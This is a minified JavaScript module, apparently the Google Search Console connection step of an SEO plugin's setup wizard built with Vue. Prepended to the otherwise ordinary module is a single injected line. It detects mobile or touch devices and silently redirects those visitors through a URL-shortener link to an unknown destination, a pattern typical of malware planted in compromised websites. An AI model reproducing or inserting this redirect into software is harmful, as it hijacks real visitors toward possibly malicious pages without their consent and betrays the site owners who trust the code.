(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{w,y as C}from"./app-core.c8323d51.js";import{u as W}from"./GoogleSearchConsole.2c609745.js";import{u as y}from"./Wizard.5cb4584f.js";import{a as x}from"./Pencil.683baab8.js";import{S as b}from"./ConnectGoogleSearchConsole.a664c050.js";import{W as A,a as L,b as B}from"./Header.bdbe4a2f.js";import{W as G}from"./CloseAndExit.e3e6e364.js";import{_ as T}from"./Steps.f042bc28.js";import{_ as F}from"./_plugin-vue_export-helper.eefbdd86.js";import{m}from"./vendor-lodash.03129cfe.js";import{aq as t,f as N,i as P,a0 as o,R as a,j as e,U as n,ae as r}from"./vendor-vue-ui.232c7c36.js";import"./vendor-other.39e59221.js";import"./Logo.a4a419c3.js";import"./Index.6933f196.js";import"./Close.7fb523c8.js";const V={setup(){const{strings:c}=y({stage:"search-console"}),{connect:i,loading:d,strings:l}=W({returnTo:"setup-wizard"});return{composableStrings:m(c,l),connect:i,loading:d,optionsStore:C(),setupWizardStore:w()}},components:{SvgCircleCheck:x,SvgConnectGoogleSearchConsole:b,WizardBody:B,WizardCloseAndExit:G,WizardContainer:L,WizardHeader:A,WizardSteps:T},data(){return{strings:m(this.composableStrings,{})}},methods:{saveAndConnect(){this.loading=!0,this.setupWizardStore.saveWizard("searchConsole").then(()=>{this.connect()})},skipStep(){const c=this.setupWizardStore.getNextLink;this.setupWizardStore.currentStage=c.name,this.setupWizardStore.saveWizard().then(()=>{this.$router.push(c)})}}},E={class:"aioseo-wizard-search-console"},R={class:"header"},U={class:"aioseo-wizard-search-console__panel"},j={class:"aioseo-wizard-search-console__image"},q={class:"aioseo-wizard-search-console__content"},D={class:"aioseo-wizard-search-console__content-text"},H={class:"aioseo-wizard-search-console__content-list"},O={class:"go-back"};function Y(c,i,d,l,s,u){const h=t("wizard-header"),z=t("wizard-steps"),f=t("svg-connect-google-search-console"),_=t("svg-circle-check"),p=t("router-link"),g=t("base-button"),S=t("wizard-body"),v=t("wizard-close-and-exit"),k=t("wizard-container");return N(),P("div",E,[o(h),o(k,null,{default:a(()=>[o(S,null,{footer:a(()=>[e("div",O,[o(p,{to:l.setupWizardStore.getPrevLink,class:"no-underline"},{default:a(()=>[...i[0]||(i[0]=[r("←",-1)])]),_:1},8,["to"]),i[1]||(i[1]=r("   ",-1)),o(p,{to:l.setupWizardStore.getPrevLink},{default:a(()=>[r(n(s.strings.goBack),1)]),_:1},8,["to"])]),i[2]||(i[2]=e("div",{class:"spacer"},null,-1)),o(g,{type:"gray",onClick:u.skipStep},{default:a(()=>[r(n(s.strings.skipThisStep),1)]),_:1},8,["onClick"]),o(g,{type:"blue",loading:l.loading,onClick:u.saveAndConnect},{default:a(()=>[r(n(s.strings.connectToGoogleSearchConsole)+" →",1)]),_:1},8,["loading","onClick"])]),default:a(()=>[o(z),e("div",R,n(s.strings.connectToGoogleSearchConsole),1),e("div",U,[e("div",j,[o(f)]),e("div",q,[e("div",D,n(s.strings.syncYourSiteWithGsc),1),e("ul",H,[e("li",null,[o(_),r(" "+n(s.strings.gscFeature1),1)]),e("li",null,[o(_),r(" "+n(s.strings.gscFeature2),1)]),e("li",null,[o(_),r(" "+n(s.strings.gscFeature3),1)]),e("li",null,[o(_),r(" "+n(s.strings.gscFeature4),1)])])])])]),_:1}),o(v)]),_:1})])}const ao=F(V,[["render",Y]]);export{ao as default};
